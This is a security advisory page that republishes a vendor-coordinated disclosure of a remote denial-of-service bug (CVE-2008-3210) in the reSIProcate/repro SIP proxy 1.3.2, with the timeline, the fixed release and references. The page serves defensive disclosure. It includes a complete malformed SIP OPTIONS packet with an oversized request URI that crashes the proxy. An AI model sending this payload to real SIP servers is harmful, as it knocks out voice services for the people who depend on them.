SecurityReason.com - Our Reason is

Security

Register | Forget Password | Login
SecurityReason
WLB
Services
RSS
Corporate
Note

If you have found a vulnerability, please send to our SecurityAlert Database :
secalert()securityreason()com

Also if you have new ( 0-day ) exploit, please send to our ExploitAlert Archive :
exploit()securityreason()com

Home arrow SecurityAlert Database

Arrow  Topic :

reSIProcate 1.3.2 Remote Denial of Service PoC


Arrow  SecurityAlert : 4013
Arrow  CVE : CVE-2008-3210
Arrow  CWE : CWE-20
Arrow  SecurityRisk : Low  Security Risk Low  (About)
Arrow  Remote Exploit : Yes
Arrow  Local Exploit : No
Arrow  Victim interaction required : No
Arrow  Exploit Available : Yes
  ExploitAlert :   4324
Arrow  Credit : Mu Dynamics research team
Arrow  Published : 20.07.2008

Arrow  Affected Software : Resiprocate, Resiprocate, 1.0
Resiprocate, Resiprocate, 1.0.1
Resiprocate, Resiprocate, 1.0.2
Resiprocate, Resiprocate, 1.0.3
Resiprocate, Resiprocate, 1.1
Resiprocate, Resiprocate, 1.2
Resiprocate, Resiprocate, 1.2 RC1
Resiprocate, Resiprocate, 1.2.2
Resiprocate, Resiprocate, 1.2.3
Resiprocate, Resiprocate, 1.3 RC1
Resiprocate, Resiprocate, 1.3.0
Resiprocate, Resiprocate, 1.3.1
Resiprocate, Resiprocate, 1.3.2



Arrow  Advisory Content :  

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Remote DoS in reSIProcate [MU-200807-01]
July 10, 2008

http://labs.mudynamics.com/advisories.html


Affected Products/Versions:

* repro SIP proxy/registrar 1.3.2
http://www.resiprocate.org/ReSIProcate_1.3.2_Release

* Any product using the reSIProcate SIP stack 1.3.2 may also be
vulnerable.


Product Overview:

http://www.resiprocate.org/

reSIProcate is a SIP stack. SIP is a protocol used for voice-over-IP
telephony. repro is a SIP proxy/registrar that uses the reSIProcate SIP
stack.


Vulnerability Details:

A malformed INVITE or OPTIONS message to the repro SIP proxy/registrar can
crash the process. The crash is caused by an assertion failure that occurs
when the domain name in the request line URI is too long
(rutil/dns/DnsStub.cxx, line 493). For example, the URI may be
"sip:bob@example.comAAAAAAA...", where "sip:bob@example.com" is followed
by
256 As. To cause the crash, the address in the To header must be a valid
target address.

Example invalid packet:
OPTIONS
sip:bob@example.comAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAA SIP/2.0
Via: SIP/2.0/UDP 127.0.0.1:54422;branch=z9hG4bKZqPsHMEiem;rport
To: "Bob" <sip:bob@example.com>
From: "Alice" <sip:alice@example.com>;tag=W4eHvLYEQX
Call-ID: nO1DpTVfo4@mudynamics.com
CSeq: 1 OPTIONS
Contact: <sip:alice@127.0.0.1:54422>
Max-Forwards: 70
Content-Length: 0


Vendor Response / Solution:

Update to 1.3.3, available from
https://www.resiprocate.org/files/pub/reSIProcate/releases/

This bug was also fixed by the reSIProcate development team in SVN on
April 23 (revision 7628).


History:

July 1, 2008 - First contact with vendor
July 1, 2008 - Vendor acknowledges vulnerability
July 3, 2008 - Vendor releases 1.3.3
July 10, 2008 - Advisory released


Mu-4000 vector:

*.request-line.line.dsv.uri.body.string.append-overflow


Credit:

This vulnerability was discovered by the Mu Dynamics research team.

http://labs.mudynamics.com/pgpkey.txt

Mu Dynamics offers a new class of security analysis system, delivering a
rigorous and streamlined methodology for verifying the robustness and
security
readiness of any IP-based product or application. Founded by the pioneers
of
intrusion detection and prevention technology, Mu Dynamics is backed by
preeminent venture capital firms that include Accel Partners, Benchmark
Capital and DAG Ventures. The company is headquartered in Sunnyvale, CA.
For
more information, visit the company's website at
http://www.mudynamics.com.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (Darwin)

iD8DBQFIdqOZQLdDlEyOXHQRAvt+AJsHGgqEVoiQi0Nb7ND9CR7HteZJpgCeMgKv
5lqpYSLdj7WBeXoD4l95+WA=
=KUQC
-----END PGP SIGNATURE-----



Arrow  References :

http://securityreason.com/expldownload/1/4324/1 (Exploit)
http://www.resiprocate.org/ReSIProcate_1.3.3_Release
http://xforce.iss.net/xforce/xfdb/43770
http://www.securityfocus.com/bid/30194
http://www.milw0rm.com/exploits/6046
http://secunia.com/advisories/31058
http://labs.mudynamics.com/advisories/MU-200807-01.txt




Arrow  Feedback :

If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
Alert

libc:fts_*() Multiple Denial of Service

Security Risk Medium- 2009-10-02

The fts functions are provided for traversing UNIX file hierarchies...

Apache RSS Apache Alert

» Apache 1.3.41 mod_proxy
   Integer overflow (code
   execution)

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion in work
   directory

» Apache Tomcat 6.0.20 and
   5.5.28 insecure partial
   deploy after failed
   undeploy

» Apache Tomcat 6.0.20 and
   5.5.28 unexpected file
   deletion and/or
   alteration

PHP RSS PHP Alert

» PHP 5.2.12/5.3.1
   session.save_path
   safe_mode and
   open_basedir bypass

» PHP 5.2.12/5.3.1 Multiple
   Vulnerabilities

» PHP 5.2.11 libgd multiple
   vulnerabilities

» PHP 5.2.11 tempnam()
   safe_mode bypass

Copyright © SecurityReason.com. All Rights Reserved.